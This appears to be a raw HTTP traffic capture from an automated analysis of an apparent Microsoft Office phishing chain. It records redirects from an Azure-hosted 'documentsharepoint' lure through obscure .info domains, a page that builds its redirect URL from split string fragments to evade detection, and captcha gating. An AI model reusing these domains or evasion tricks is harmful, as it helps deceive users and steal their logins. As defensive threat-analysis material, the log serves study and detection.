X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:09 UTC	8107	IN	Data Raw: 76 61 72 20 6d 66 5f 73 68 61 72 65 64 3b 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 72 2c 74 2c 61 2c 6e 2c 6f 2c 69 2c 66 2c 6c 2c 75 2c 73 2c 64 2c 63 2c 68 2c 70 2c 6d 2c 76 2c 67 2c 62 2c 79 3d 7b 39 34 34 39 3a 28 65 2c 72 2c 74 29 3d 3e 7b 76 61 72 20 61 3d 7b 22 2e 2f 75 73 65 50 61 67 65 73 53 74 6f 72 65 22 3a 28 29 3d 3e 74 2e 65 28 37 35 33 29 2e 74 68 65 6e 28 28 28 29 3d 3e 28 29 3d 3e 74 28 36 37 35 33 29 29 29 2c 22 2e 2f 46 65 64 65 72 61 74 65 64 43 6f 6e 74 72 6f 6c 22 3a 28 29 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 74 2e 65 28 33 37 30 29 2c 74 2e 65 28 35 29 2c 74 2e 65 28 38 31 39 29 5d 29 2e 74 68 65 6e 28 28 28 29 3d 3e 28 29 3d 3e 74 28 39 33 33 34 29 29 29 7d 2c 6e 3d 28 65 2c 72 29 3d 3e 28 Data Ascii: var mf_shared;(()=>{"use strict";var e,r,t,a,n,o,i,f,l,u,s,d,c,h,p,m,v,g,b,y={9449:(e,r,t)=>{var a={"./usePagesStore":()=>t.e(753).then((()=>()=>t(6753))),"./FederatedControl":()=>Promise.all([t.e(370),t.e(5),t.e(819)]).then((()=>()=>t(9334)))},n=(e,r)=>(

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:09 UTC	785	OUT	GET /CfLtH HTTP/1.1 Host: ugbllcgroupsec.info Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://documentsharepoint-officeb875553995f4546655-dcc6cegmfqbrgudr.canadaeast-01.azurewebsites.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:10 UTC	747	IN	HTTP/1.1 301 Moved Permanently set-cookie: PHPSESSID=iq33f9iu9al1q34831se8gjrsr; path=/ expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: short_1=1; expires=Wed, 15-Jan-2025 14:27:09 GMT; Max-Age=900; path=/; HttpOnly location: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd content-type: text/html; charset=UTF-8 content-length: 0 date: Wed, 15 Jan 2025 14:12:09 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:10 UTC	880	OUT	GET /mQlruOEx?gsjnbjbhv87934hr874rbif43hf=JHHJHVJHJJKDNJKNDJII93JNJJjjjd HTTP/1.1 Host: office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://documentsharepoint-officeb875553995f4546655-dcc6cegmfqbrgudr.canadaeast-01.azurewebsites.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:11 UTC	17	IN	HTTP/1.1 200 OK
2025-01-15 14:12:11 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-15 14:12:11 UTC	25	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a Data Ascii: Content-Type: text/html
2025-01-15 14:12:11 UTC	198	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6a 79 6c 76 3d 64 33 39 38 34 34 39 38 33 35 32 34 32 31 66 65 36 39 36 37 30 33 30 37 38 39 31 31 30 38 34 61 31 62 37 35 35 66 62 62 38 31 30 33 61 63 32 35 62 34 36 61 65 34 37 31 36 39 32 64 31 61 33 62 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 39 35 70 69 62 32 6f 7a 77 72 77 34 77 32 62 34 74 31 75 62 72 78 70 6a 63 37 36 64 6f 73 33 6e 6f 70 68 76 69 72 68 74 2e 69 6e 66 6f 3b 20 45 78 70 69 72 65 73 3d 57 65 64 2c 20 31 35 20 4a 61 6e 20 32 30 32 35 20 31 35 3a 31 32 3a 31 31 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 0d 0a Data Ascii: Set-Cookie: jylv=d3984498352421fe696703078911084a1b755fbb8103ac25b46ae471692d1a3b; Path=/; Domain=95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info; Expires=Wed, 15 Jan 2025 15:12:11 GMT; Max-Age=3600
2025-01-15 14:12:11 UTC	28	IN	Data Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a Data Ascii: Transfer-Encoding: chunked
2025-01-15 14:12:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-15 14:12:11 UTC	6	IN	Data Raw: 38 34 39 35 0d 0a Data Ascii: 8495
2025-01-15 14:12:11 UTC	16384	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 23 72 65 67 69 6f 6e 28 63 6f 6c 6c 61 70 73 65 64 29 2d 2d 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html><html lang="en-US"> ... #region(collapsed)--> <head> <style> * { box-sizing: border-box; margin: 0; padding: 0; } html {
2025-01-15 14:12:11 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 27 20 2b 20 27 70 27 20 2b 20 27 73 27 20 2b 20 27 3a 2f 27 20 2b 20 27 2f 6f 66 27 20 2b 20 27 66 69 63 27 20 2b 20 27 65 2e 27 20 2b 20 27 39 35 70 27 20 2b 20 27 69 27 20 2b 20 27 62 32 6f 27 20 2b 20 27 7a 27 20 2b 20 27 77 72 77 27 20 2b 20 27 34 27 20 2b 20 27 77 32 27 20 2b 20 27 62 27 20 2b 20 27 34 27 20 2b 20 27 74 31 27 20 2b 20 27 75 27 20 2b 20 27 62 27 20 2b 20 27 72 78 27 20 2b 20 27 70 6a 63 27 20 2b 20 27 37 36 27 20 2b 20 27 64 6f 27 20 2b 20 27 73 33 6e 27 20 2b 20 27 6f 70 27 20 2b 20 27 68 27 20 2b 20 27 76 69 72 27 20 2b 20 27 68 74 2e 27 20 2b 20 27 69 6e 27 20 2b 20 27 66 27 20 2b 20 27 6f 2f 6d 27 20 2b 20 27 51 6c 27 20 2b 20 27 Data Ascii: window.location.href = 'htt' + 'p' + 's' + ':/' + '/of' + 'fic' + 'e.' + '95p' + 'i' + 'b2o' + 'z' + 'wrw' + '4' + 'w2' + 'b' + '4' + 't1' + 'u' + 'b' + 'rx' + 'pjc' + '76' + 'do' + 's3n' + 'op' + 'h' + 'vir' + 'ht.' + 'in' + 'f' + 'o/m' + 'Ql' + '
2025-01-15 14:12:11 UTC	1173	IN	Data Raw: 20 20 20 20 3c 64 69 76 20 69 64 3d 22 74 75 72 6e 73 74 69 6c 65 43 61 70 74 63 68 61 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 63 68 61 6c 6c 65 6e 67 65 2d 66 61 63 74 2d 77 72 61 70 70 65 72 20 63 6c 61 73 73 3d 22 66 61 63 74 20 73 70 61 63 65 72 20 68 69 64 64 65 6e 22 20 73 74 79 6c 65 3d 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 3e 3c 73 70 61 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 66 61 63 74 2d 74 69 74 6c 65 3e 44 69 64 20 79 6f 75 20 6b 6e 6f 77 Data Ascii: <div id="turnstileCaptcha"></div> <br> </form> <div id=challenge-fact-wrapper class="fact spacer hidden" style=display:block;visibility:visible><span class=fact-title>Did you know
2025-01-15 14:12:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:11 UTC	611	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:12 UTC	386	IN	HTTP/1.1 302 Found Date: Wed, 15 Jan 2025 14:12:12 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/e0c90b6a3ed1/api.js Server: cloudflare CF-RAY: 902675974e108c39-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:11 UTC	559	OUT	GET /1/api.js HTTP/1.1 Host: js.hcaptcha.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:12 UTC	487	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:12 GMT Content-Type: application/javascript Transfer-Encoding: chunked Connection: close etag: W/"a9b0c42bb513f1f63e6b58ce9bfce558" Cache-Control: max-age=300 alt-svc: h3=":443"; ma=86400 vary: Origin CF-Cache-Status: HIT Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff age: 0 cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 902675971d8ac345-EWR
2025-01-15 14:12:12 UTC	882	IN	Data Raw: 37 64 61 64 0d 0a 2f 2a 20 7b 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 30 22 2c 20 22 68 61 73 68 22 3a 20 22 4d 45 59 43 49 51 43 4b 66 49 32 6c 79 37 4a 6d 33 58 44 36 32 6a 53 4d 59 66 56 53 51 41 48 66 50 53 61 44 6c 79 4f 44 42 6c 35 37 56 46 4f 4d 47 41 49 68 41 4f 49 50 6a 7a 34 77 7a 79 30 38 46 61 4a 66 44 52 64 4d 75 50 63 54 42 79 62 76 41 41 64 59 37 75 33 69 58 45 71 57 39 4a 55 6a 22 20 7d 20 2a 2f 0a 2f 2a 20 68 74 74 70 73 3a 2f 2f 68 63 61 70 74 63 68 61 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 68 65 6e 28 28 66 Data Ascii: 7dad/* { "version": "0", "hash": "MEYCIQCKfI2ly7Jm3XD62jSMYfVSQAHfPSaDlyODBl57VFOMGAIhAOIPjz4wzy08FaJfDRdMuPcTBybvAAdY7u3iXEqW9JUj" } // https://hcaptcha.com/license */!function(){"use strict";function e(e){var t=this.constructor;return this.then((f
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 73 3a 22 66 75 6c 66 69 6c 6c 65 64 22 2c 76 61 6c 75 65 3a 6e 7d 2c 30 3d 3d 2d 2d 69 26 26 74 28 72 29 7d 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 72 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 6f 28 61 2c 72 5b 61 5d 29 7d 29 29 7d 76 61 72 20 6e 3d 73 65 74 54 69 6d 65 6f 75 74 2c 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 74 49 6d 6d 65 64 69 61 74 65 3f 73 65 74 49 6d 6d 65 64 69 61 74 65 3a 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 6c 65 6e 67 74 68 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f Data Ascii: s:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceo
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 6e 29 7b 74 68 69 73 2e 6f 6e 46 75 6c 66 69 6c 6c 65 64 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 6e 75 6c 6c 2c 74 68 69 73 2e 6f 6e 52 65 6a 65 63 74 65 64 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 3a 6e 75 6c 6c 2c 74 68 69 73 2e 70 72 6f 6d 69 73 65 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 76 61 72 20 6e 3d 21 31 3b 74 72 79 7b 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 7c 7c 28 6e 3d 21 30 2c 63 28 74 2c 65 29 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 7c 7c 28 6e 3d 21 30 2c 6c 28 74 2c 65 29 29 7d 29 29 7d 63 61 74 63 68 28 72 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 3b 6e 3d 21 30 2c 6c 28 74 2c 72 29 7d 7d 61 2e 70 Data Ascii: function h(e,t,n){this.onFulfilled="function"==typeof e?e:null,this.onRejected="function"==typeof t?t:null,this.promise=n}function d(e,t){var n=!1;try{e((function(e){n\|\|(n=!0,c(t,e))}),(function(e){n\|\|(n=!0,l(t,e))}))}catch(r){if(n)return;n=!0,l(t,r)}}a.p
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 6e 68 61 6e 64 6c 65 64 20 50 72 6f 6d 69 73 65 20 52 65 6a 65 63 74 69 6f 6e 3a 22 2c 65 29 7d 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 29 72 65 74 75 72 6e 20 73 65 6c 66 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 29 72 65 74 75 72 6e 20 67 6c 6f 62 61 6c 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 75 6e 61 62 6c 65 20 74 6f 20 6c 6f 63 61 74 65 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e Data Ascii: nhandled Promise Rejection:",e)};var f=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();function p(e,t,n){return
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 62 65 6c 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 5f 5b 74 5d 3d 65 7d 29 29 7d 29 29 7d 29 29 3b 76 61 72 20 78 2c 45 3d 7b 22 55 54 46 2d 38 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6a 28 65 29 7d 7d 2c 43 3d 7b 22 55 54 46 2d 38 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 54 28 65 29 7d 7d 2c 53 3d 22 75 74 66 2d 38 22 3b 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 29 7b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 4f 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6c 6c 65 64 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 2e 20 44 69 64 20 79 6f 75 20 66 6f 72 67 65 74 20 27 6e 65 77 27 3f 22 29 3b 65 3d 65 21 3d 3d 75 6e 64 65 66 69 Data Ascii: bels.forEach((function(t){_[t]=e}))}))}));var x,E={"UTF-8":function(e){return new j(e)}},C={"UTF-8":function(e){return new T(e)}},S="utf-8";function O(e,t){if(!(this instanceof O))throw TypeError("Called as a function. Did you forget 'new'?");e=e!==undefi
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 50 72 6f 70 65 72 74 79 7c 7c 28 74 68 69 73 2e 65 6e 63 6f 64 69 6e 67 3d 6e 2e 5f 65 6e 63 6f 64 69 6e 67 2e 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 76 61 72 20 74 3d 65 2e 66 61 74 61 6c 2c 6e 3d 30 2c 72 3d 30 2c 69 3d 30 2c 6f 3d 31 32 38 2c 61 3d 31 39 31 3b 74 68 69 73 2e 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 73 29 7b 69 66 28 73 3d 3d 3d 79 26 26 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 3d 30 2c 62 28 74 29 3b 69 66 28 73 3d 3d 3d 79 29 72 65 74 75 72 6e 20 77 3b 69 66 28 30 3d 3d 3d 69 29 7b 69 66 28 70 28 73 2c 30 2c 31 32 37 29 29 72 65 74 75 72 6e 20 73 3b 69 66 28 70 28 73 2c 31 39 34 2c 32 32 33 29 29 69 3d 31 2c 6e 3d 33 31 26 73 3b 65 6c 73 65 20 69 66 Data Ascii: Property\|\|(this.encoding=n._encoding.name.toLowerCase()),n}function T(e){var t=e.fatal,n=0,r=0,i=0,o=128,a=191;this.handler=function(e,s){if(s===y&&0!==i)return i=0,b(t);if(s===y)return w;if(0===i){if(p(s,0,127))return s;if(p(s,194,223))i=1,n=31&s;else if
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 68 7c 7c 28 74 68 69 73 2e 5f 64 65 63 6f 64 65 72 3d 43 5b 74 68 69 73 2e 5f 65 6e 63 6f 64 69 6e 67 2e 6e 61 6d 65 5d 28 7b 66 61 74 61 6c 3a 22 66 61 74 61 6c 22 3d 3d 3d 74 68 69 73 2e 5f 65 72 72 6f 72 5f 6d 6f 64 65 7d 29 2c 74 68 69 73 2e 5f 42 4f 4d 73 65 65 6e 3d 21 31 29 2c 74 68 69 73 2e 5f 64 6f 5f 6e 6f 74 5f 66 6c 75 73 68 3d 42 6f 6f 6c 65 61 6e 28 74 2e 73 74 72 65 61 6d 29 3b 66 6f 72 28 76 61 72 20 72 2c 69 3d 6e 65 77 20 76 28 6e 29 2c 6f 3d 5b 5d 3b 3b 29 7b 76 61 72 20 61 3d 69 2e 72 65 61 64 28 29 3b 69 66 28 61 3d 3d 3d 79 29 62 72 65 61 6b 3b 69 66 28 28 72 3d 74 68 69 73 2e 5f 64 65 63 6f 64 65 72 2e 68 61 6e 64 6c 65 72 28 69 2c 61 29 29 3d 3d 3d 77 29 62 72 65 61 6b 3b 6e 75 6c 6c 21 3d 3d 72 26 26 28 41 72 72 61 79 2e 69 73 41 Data Ascii: h\|\|(this._decoder=C[this._encoding.name]({fatal:"fatal"===this._error_mode}),this._BOMseen=!1),this._do_not_flush=Boolean(t.stream);for(var r,i=new v(n),o=[];;){var a=i.read();if(a===y)break;if((r=this._decoder.handler(i,a))===w)break;null!==r&&(Array.isA
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 35 33 33 29 3b 65 6c 73 65 20 69 66 28 6f 3e 3d 35 35 32 39 36 26 26 6f 3c 3d 35 36 33 31 39 29 69 66 28 72 3d 3d 3d 6e 2d 31 29 69 2e 70 75 73 68 28 36 35 35 33 33 29 3b 65 6c 73 65 7b 76 61 72 20 61 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 31 29 3b 69 66 28 61 3e 3d 35 36 33 32 30 26 26 61 3c 3d 35 37 33 34 33 29 7b 76 61 72 20 73 3d 31 30 32 33 26 6f 2c 63 3d 31 30 32 33 26 61 3b 69 2e 70 75 73 68 28 36 35 35 33 36 2b 28 73 3c 3c 31 30 29 2b 63 29 2c 72 2b 3d 31 7d 65 6c 73 65 20 69 2e 70 75 73 68 28 36 35 35 33 33 29 7d 72 2b 3d 31 7d 72 65 74 75 72 6e 20 69 7d 28 65 29 29 2c 69 3d 5b 5d 3b 3b 29 7b 76 61 72 20 6f 3d 72 2e 72 65 61 64 28 29 3b 69 66 28 6f 3d 3d 3d 79 29 62 72 65 61 6b 3b 69 66 28 28 6e 3d 74 68 69 73 2e 5f 65 6e 63 6f 64 65 72 Data Ascii: 533);else if(o>=55296&&o<=56319)if(r===n-1)i.push(65533);else{var a=t.charCodeAt(r+1);if(a>=56320&&a<=57343){var s=1023&o,c=1023&a;i.push(65536+(s<<10)+c),r+=1}else i.push(65533)}r+=1}return i}(e)),i=[];;){var o=r.read();if(o===y)break;if((n=this._encoder
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 61 70 4b 65 79 22 3a 6c 3d 62 5b 34 5d 2c 75 3d 62 5b 35 5d 2c 68 3d 62 5b 36 5d 2c 62 5b 32 5d 3d 63 2e 5f 6b 65 79 7d 69 66 28 22 67 65 6e 65 72 61 74 65 4b 65 79 22 3d 3d 3d 65 26 26 22 48 4d 41 43 22 3d 3d 3d 6c 2e 6e 61 6d 65 26 26 6c 2e 68 61 73 68 29 72 65 74 75 72 6e 20 6c 2e 6c 65 6e 67 74 68 3d 6c 2e 6c 65 6e 67 74 68 7c 7c 7b 22 53 48 41 2d 31 22 3a 35 31 32 2c 22 53 48 41 2d 32 35 36 22 3a 35 31 32 2c 22 53 48 41 2d 33 38 34 22 3a 31 30 32 34 2c 22 53 48 41 2d 35 31 32 22 3a 31 30 32 34 7d 5b 6c 2e 68 61 73 68 2e 6e 61 6d 65 5d 2c 6e 2e 69 6d 70 6f 72 74 4b 65 79 28 22 72 61 77 22 2c 74 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 6c 2e 6c 65 6e 67 74 68 2b 37 3e 3e 33 29 29 2c 6c 2c 75 2c 68 Data Ascii: apKey":l=b[4],u=b[5],h=b[6],b[2]=c._key}if("generateKey"===e&&"HMAC"===l.name&&l.hash)return l.length=l.length\|\|{"SHA-1":512,"SHA-256":512,"SHA-384":1024,"SHA-512":1024}[l.hash.name],n.importKey("raw",t.getRandomValues(new Uint8Array(l.length+7>>3)),l,u,h
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 6e 22 48 4d 41 43 22 3d 3d 3d 6c 2e 6e 61 6d 65 26 26 28 6c 2e 6c 65 6e 67 74 68 7c 7c 28 6c 2e 6c 65 6e 67 74 68 3d 38 2a 65 2e 61 6c 67 6f 72 69 74 68 6d 2e 6c 65 6e 67 74 68 29 29 2c 30 3d 3d 6c 2e 6e 61 6d 65 2e 73 65 61 72 63 68 28 22 52 53 41 22 29 26 26 28 6c 2e 6d 6f 64 75 6c 75 73 4c 65 6e 67 74 68 7c 7c 28 6c 2e 6d 6f 64 75 6c 75 73 4c 65 6e 67 74 68 3d 28 65 2e 70 75 62 6c 69 63 4b 65 79 7c 7c 65 29 2e 61 6c 67 6f 72 69 74 68 6d 2e 6d 6f 64 75 6c 75 73 4c 65 6e 67 74 68 29 2c 6c 2e 70 75 62 6c 69 63 45 78 70 6f 6e 65 6e 74 7c 7c 28 6c 2e 70 75 62 6c 69 63 45 78 70 6f 6e 65 6e 74 3d 28 65 2e 70 75 62 6c 69 63 4b 65 79 7c 7c 65 29 2e 61 6c 67 6f 72 69 74 68 6d 2e 70 75 62 6c 69 63 45 78 70 6f 6e 65 6e 74 29 29 2c 65 3d 65 2e 70 75 62 6c 69 63 4b Data Ascii: n"HMAC"===l.name&&(l.length\|\|(l.length=8*e.algorithm.length)),0==l.name.search("RSA")&&(l.modulusLength\|\|(l.modulusLength=(e.publicKey\|\|e).algorithm.modulusLength),l.publicExponent\|\|(l.publicExponent=(e.publicKey\|\|e).algorithm.publicExponent)),e=e.publicK

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:12 UTC	595	OUT	GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
